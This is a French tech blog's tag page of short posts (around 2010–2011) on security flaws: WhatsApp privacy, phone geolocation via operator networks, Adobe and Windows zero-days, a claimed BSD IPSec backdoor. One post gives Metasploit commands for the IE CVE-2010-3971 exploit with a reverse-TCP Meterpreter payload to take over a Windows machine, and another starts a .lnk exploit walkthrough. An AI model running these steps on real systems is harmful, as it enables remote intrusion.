Articles taggés faille
WhatsApp : L’application est un peu trop causante
3Cela faisait longtemps qu’un billet n’avait pas été mis ici et je reprend le flambeau pour vous parler d’une petite application bien pratique, mais qui a également ses limites, il s’agit de WhatsApp.
Que fait-elle ?
Cette application est tout simplement un client de messagerie pour presque toutes les plateformes mobiles actuelles, à savoir iOS, Android, BlackBerry, Windows Phone et Symbian. Elle permet de contacter ses amis possédant également cette application via une interface simple, et en utilisant votre forfait data plutôt que votre forfait classique (donc ça coûte rien pour ceux qui sont toujours connecté en Wifi 
).
Mais pourquoi j’en parle ?
Tout simplement parce que deux gouvernements ont attaqué les créateurs de l’application du fait que celle-ci est un peu trop causante. En effet, pour faire le lien entre vous et vos amis, elle se base sur votre carnet de contacts, vérifie si les contacts sont présents dans les bases de données de l’application et si tel est le cas, vous indique que votre contact a l’application d’installée.
Le problème se situe alors à ce niveau, car d’après les Pays-Bas et le Canada, les informations des contacts sont stockées sur les serveurs de WhatsApp. De plus, il semblerait que les conversations et les mots de passe utilisés manquant un peu de chiffrement et de sécurité, ce qui pose un réel problème quand à la confidentialité des échanges.
Cependant rassurez-vous, les développeurs ont pris connaissance de ces accusations et font tout leur possible pour modifier le fonctionnement de l’application afin qu’elle se cale plus sur les us et coutumes de ce genre d’applications. Cela va donc dans le bon sens.
Pensez seulement à bien vous renseigner sur les différentes informations lues et traitées par ce genre d’application, on n’est jamais à l’abri de mauvaises pratiques.
[Source]
Géolocalisation d’un téléphone via une faille au niveau opérateur
7Je vous en avais parlé fut un temps, nos chers smartphones stockent énormément d’informations et notamment nos historiques de déplacement par le biais des positions GPS. Il était alors assez facile de retracer les voyages de différentes personnes en analysant ces logs, tant qu’on arrivait à mettre la main dessus.
Et bien aujourd’hui, je suis tombé sur une petite news qui risque là aussi de faire parler d’elle, car cela peut aller encore plus loin maintenant ! En effet, grâce à une faille au niveau du réseau mobile lui-même, il est rendu possible à tout un chacun de géolocaliser un téléphone dès lors que vous avez un numéro de téléphone s’y rapportant ! Ceci est encore plus fort dans le sens que le matériel nécessaire pour cette récupération de géolocalisation se limite seulement à un ordinateur et un autre téléphone portable.
Le processus est assez simple dans les faits, et ne demande aucune relation directe avec les opérateurs. Il vous faut simplement brancher votre téléphone portable à votre ordinateur et écouter les transmissions qui vont avoir lieu lorsque vous allez tenter d’appeler le numéro de téléphone que vous souhaitez localiser. Ce sont finalement ces transmissions, entre votre téléphone et les tours de téléphonie, qui vous permettront de localiser votre “cible” dans un rayon d’environ 12km.
Et parce que des images valent mieux qu’un long discours, voici une petite vidéo d’explication du processus.
Alors, qu’en pensez-vous ?
[Source]
[Sécurité] Une nouvelle 0-day pour Adobe Flash
2On apprend ainsi qu’Adobe émet une alerte concernant ses applications Flash et leur sécurité.
Cette vulnérabilité, désignée comme critique, est donc présente actuellement sur les dernières versions du player, à savoir les 10.2.152.33 et 10.2.154.18, et touche les environnements Windows, Mac OS, Linux et Solaris (autant dire que tout le monde est concerné !). Elle est également présente sur le player de Chrome, mais grâce à sa dernière mouture, le problème devrait être isolé dans la sandbox du navigateur. Les versions du Flash Player pour Android 10.1.106.16 et antérieures ne sont pas non plus en reste, tout comme Adobe Reader et Acrobat en version 10.x et 9.x utilisant le composant Authplay.dll pour Windows et Macintosh.
Cette alerte est donc faite suite à des informations obtenues par Adobe concernant des tentatives d’attaque perpétrées par l’intermédiaire d’un fichier Flash intégré dans un fichier Excel, tout ceci envoyé par courriel à des utilisateurs par la suite infectée.
Dans les faits, cette faille cause un arrêt de l’application et offre (gracieusement ?) à un attaquant le contrôle du poste affecté.
Enfin, sachez qu’aucun correctif n’est disponible pour le moment afin de combler cette faille, et qu’il faudra attendre la mise à jour trimestrielle des applications d’Adobe (à savoir le 14 juin) pour voir une correction de la faille apparaître.
D’ici là, et même quand la mise à jour sera faite, faites attention à ce sur quoi vous cliquez !
La dernière faille IE … Et si on l’exploitait ?
2
La dernière faille d’IE, sur laquelle Microsoft à communiqué il y a peu, fait pas mal parler d’elle en ce moment… De plus, un exploit est disponible pour Metasploit ! Alors, on teste la sécurité de votre système ? (à tester seulement chez soi bien, ceci n’est pas fait pour être utilisé sur un ordinateur qui n’est pas le votre…)
Le code CVE de cette faille est : CVE-2010-3971.
Allez, on lance metasploit (je passe sur l’installation), on choisit l’exploit et configure tout ça !
./msfconsole use exploit/windows/browser/ms11_xxx_ie_css_import set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.131 'l'IP de votre machine contenant metasploit exploit |
On récupère une URL (que vous pouvez d’ailleurs définir comme bon vous semble).
Lancez cette URL sur la machine cliente Windows (avec IE 6/7 ou 8, n’importe quelle version de Windows mais le Framework 2.0 minimum doit être présent)
Si tout s’est bien passé, un p’tit affichage des sessions et une prise en main de la session devraient être possible !
session -l session -i 1 |
Et voilà ! Tout simplement ! Enjoy !
[image]
BSD Fail !
4Il y a 2 ans
Bon, je me sens obligé de faire cet article car je vois que les Tux ne se décident pas vraiment à le faire, ce qui est quand même étonnant !!! Et oui car tous les pro Unix, Open source et tout se sente un petit con aujourd’hui car un certain Gregory Perry, qui était directeur technique de la société NETSEC vient de faire des révélations pour le moins étonnantes. En effet, “Durant les années 2000 et 2001, le FBI aurait demandé à NETSEC d’intégrer dans la couche IPSec des portes dérobées“. En gros le FBI aurait demandé l’intégration de failles dans le système afin de pouvoir entrer et surveiller le système de chiffrement VPN de site a site implémenté par l’EOUSA, une organisation parente du FBI.
M. Perry avait signé une clause de confidentialité de 10ans mais le délais est maintenant écoulé du coup il révèle tout au grand public ! Du coup se sont toutes les dérivations du code de BSD qui se trouve directement touchées comme les célèbres déclinaisons FreeBSD, OpenBSD ou encore NetBSD. 10 ans de développement OpenSource, de remaniement et de réutilisation de ces codes et personne n’aurait remarqué ces failles oO. Maintenant ce sont tous les serveurs utilisant cette techno qui se retrouvent directement menacés !!
Personnellement cette histoire me fait bien marrer et du coup si ces révélations sont vrai, cela ridiculise pas mal toute la communauté open source BSD (je pense pas que le FBI est pu arroser tout le monde et encore moins en connaissant la façon de pensée de la plupart du monde Open Source. Qui je pense aurait refusé catégoriquement de collaborer avec le FBI)
Quand je vois le bordel que nous font Kaluche et ses potes dès qu’une nouvelle 0 day Windows est révélée, je trouve qu’on vous entend pas des masses là XD !!!
Source : PCinpact
Edit Bonus : les premières failles détectées
Metasploit : exploitation de la faille sur les .lnk (Window) et prise de contrôle !
2Maintenant que nous avons un metasploit à jour, et tout frais via les mise à jour svn, nous allons utiliser la faille Windows sur les raccourcis, celle qui a fait pas mal de bruit mi-juillet 2010 ! Bien qu’elle soit patché depuis peu, elle est encore très utilisé, et j’avais très envie de la tester !
1 – Lancement de Metasploit
On commence par se rendre dans le répertoire de metasploit, et le lance en mode console (parce que c’est quand même beaucoup plus amusant !)
cd metasploit sudo ./msfconsole |
Diaspora, le Facebook libre … mais pas sécurisé !
12Il y a 2 ans
La grande question du moment, dans notre petit monde de geeks, est : allons nous basculer vers Diaspora, l’alternative libre à Facebook, qui n’utilisera / ne vendra pas vos photos, info et autres coordonnées à diverses entreprises tierces. D’instinct, au premier jugement, on se tournerait facilement vers le “oui” !
Dernièrement, le code source de Diaspora a été mis en ligne et rendu disponible pour permettre à tout le monde de jeter un coup d’oeil au source… Bien entendu, des hackers se sont penchés dessus, et là … et là, on se rend compte, selon leurs dires, que Diaspora est aussi truffé de failles que Windows qu’un gruyère : failles XSS, ajout de contacts chez un autre utilisateurs, suppression de photos, etc… Bref, n’importe quel type d’intrusion et de prise de contrôle apparaît comme réalisable…
Bien entendu, les développeurs avait prévenu que certaines failles devaient exister… Mais à ce point !
Enfin, la version Alpha est prévu pour octobre prochain … qui a dit qu’elle allait être repoussée ? 
[source]
Nouvelle faille Asp.Net
0Il y a 2 ans
Une nouvelle faille vient d’être découverte au sein d’application AspNet et d’autre frameword tel que JavaServer Faces, Ruby on Rails et OWASP ESAPI. Cette faille permettrait aux hackers de déchiffrer les cookies mettant ainsi en péril la sécurité des données critiques.
Cette faille est de type « Padding Oracles Everywhere » et selon les deux chercheurs qui l’on découvert elle serait a prendre autant au serieux que les injestions SQL et les attaques type XSS.
Voila pour ceux que le côté technique intéresserait !!
Il n’y a plus qu’à attendre la sortie d’un patch correctif !!
[Sécurité] Une 0-day pour Adobe Reader 9.3.4 … Encore une …
13![adobe logo [Sécurité] Une 0 day pour Adobe Reader 9.3.4 … Encore une …](http://troll-me.fr/wp-content/uploads/2010/09/adobe-logo.jpg "adobe-logo"){kind=logo}
Allez, une fois n’est pas coutume : une nouvelle faille vient d’être découverte sur Adobe Reader et permet, via utilisation d’un exploit privé :
- plantage du système distant
- prise de contrôle du système distant
La faille concerne les systèmes Windows, Linux et Macintosh. Et pour Adobe, les versions concernées sont la 9.3.4 et antérieurs pour Adobe Reader & Adobe Acrobat…
Je crois que je vais arrêter d’ouvrir les pdf, à ce rythme là…
Une 0-Day pour Windows !
0Il y a 2 ans
par Kaluche
dans Informatique
507 vues
Une nouvelle alerte pour Microsoft : une faille 0-Day vient d’être découverte il y a quelques heures…
Alors, comment fonctionne cette nouvelle bébête ? Via clé-USB, mes chers ! Au moment de l’exploration de la clé via l’utilitaire Windows (ou même de l’explorateur) lors du branchement de la clé, un fichier *.lnk situé à la racine de la clé s’exécute et pouf, vous voilà contaminé par le Malware !
Donc, soyez prudents ! En attendant, utilisateurs Windows, prenez garde : la session administrateur, cay le mâle !
[source]
Commentaires récents